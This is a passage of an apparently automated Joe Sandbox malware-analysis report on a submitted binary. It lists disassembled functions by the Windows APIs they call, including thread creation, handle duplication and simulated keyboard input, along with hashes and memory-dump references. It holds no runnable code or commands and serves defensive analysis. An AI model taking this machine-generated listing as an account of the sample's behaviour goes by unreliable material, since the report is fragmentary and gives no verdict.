                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                                    • String ID:
                                                    • API String ID: 3985565216-0
                                                    • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                                    • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                                    • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0041F707
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _free.LIBCMT ref: 0041F71A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap_free_malloc
                                                    • String ID: [B
                                                    • API String ID: 1020059152-632041663
                                                    • Opcode ID: 18bdde6ef1fa99051b9de9e8275e3ee91fb716c3c69f2f77da2da8365cce6233
                                                    • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                                    • Opcode Fuzzy Hash: 18bdde6ef1fa99051b9de9e8275e3ee91fb716c3c69f2f77da2da8365cce6233
                                                    • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                                                    • __calloc_crt.LIBCMT ref: 00413DB0
                                                    • __getptd.LIBCMT ref: 00413DBD
                                                    • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                                                    • _free.LIBCMT ref: 00413E07
                                                    • __dosmaperr.LIBCMT ref: 00413E12
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                    • String ID:
                                                    • API String ID: 155776804-0
                                                    • Opcode ID: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                    • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                                    • Opcode Fuzzy Hash: 2348856d60b5f8ae92a3c52096df9563f03509e61ea6f3f8618797eae5d9925f
                                                    • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                                    APIs
                                                      • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                                      • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                                    • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                                    • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                                    • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                    • String ID:
                                                    • API String ID: 1957940570-0
                                                    • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                                    • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                                    • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                                    APIs
                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                    • String ID:
                                                    • API String ID: 259663610-0
                                                    • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                                                    • Opcode Fuzzy Hash: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                                                    • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                                                    APIs
                                                    • GetClientRect.USER32(?,?), ref: 004302E6
                                                    • GetWindowRect.USER32(00000000,?), ref: 00430316
                                                    • GetClientRect.USER32(?,?), ref: 00430364
                                                    • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                                    • GetWindowRect.USER32(?,?), ref: 004303C3
                                                    • ScreenToClient.USER32(?,?), ref: 004303EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Rect$Client$Window$MetricsScreenSystem
                                                    • String ID:
                                                    • API String ID: 3220332590-0
                                                    • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                                    • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                                    • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _malloc_wcslen$_strcat_wcscpy
                                                    • String ID:
                                                    • API String ID: 1612042205-0
                                                    • Opcode ID: 52953b717e3985cfe0933cd7898f211bc63a7339cf02a13d2107c8b459862f29
                                                    • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                                    • Opcode Fuzzy Hash: 52953b717e3985cfe0933cd7898f211bc63a7339cf02a13d2107c8b459862f29
                                                    • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strncmp
                                                    • String ID: >$U$\
                                                    • API String ID: 2666721431-237099441
                                                    • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                                    • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                                    • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044C570
                                                    • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                    • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                    • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                    • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                    • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessagePost$KeyboardState$InputSend
                                                    • String ID:
                                                    • API String ID: 2221674350-0
                                                    • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                    • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                    • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$_wcscat
                                                    • String ID:
                                                    • API String ID: 2037614760-0
                                                    • Opcode ID: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                    • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                                    • Opcode Fuzzy Hash: cc5f24ba9fb77c1fb1fe1c0710fcc73dec9ab40ad7bfe8f9893d0625b32ee804
                                                    • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                    • VariantClear.OLEAUT32(?), ref: 00451CA1
                                                    • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$AllocClearErrorLastString
                                                    • String ID:
                                                    • API String ID: 960795272-0
                                                    • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                    • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                    • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                    APIs
                                                    • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                    • String ID:
                                                    • API String ID: 4189319755-0
                                                    • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                    • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                    • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                    APIs
                                                    • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                    • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                    • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                    • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$LongWindow$InvalidateRect
                                                    • String ID:
                                                    • API String ID: 1976402638-0
                                                    • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                    • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                    • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                    APIs
                                                    • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                    • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                    • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                    • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                    • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                    • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Window$Show$Enable$MessageSend
                                                    • String ID:
                                                    • API String ID: 642888154-0
                                                    • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                    • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                    • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2182629858.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2182593651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182975447.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2182994985.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183017927.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183041814.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2183100937.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_juE8dtqPkx.jbxd
                                                    Similarity
                                                    • API ID: Variant$Copy$ClearErrorLast
                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                    • API String ID: 2487901850-572801152
                                                    • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                    • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                    • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                    APIs
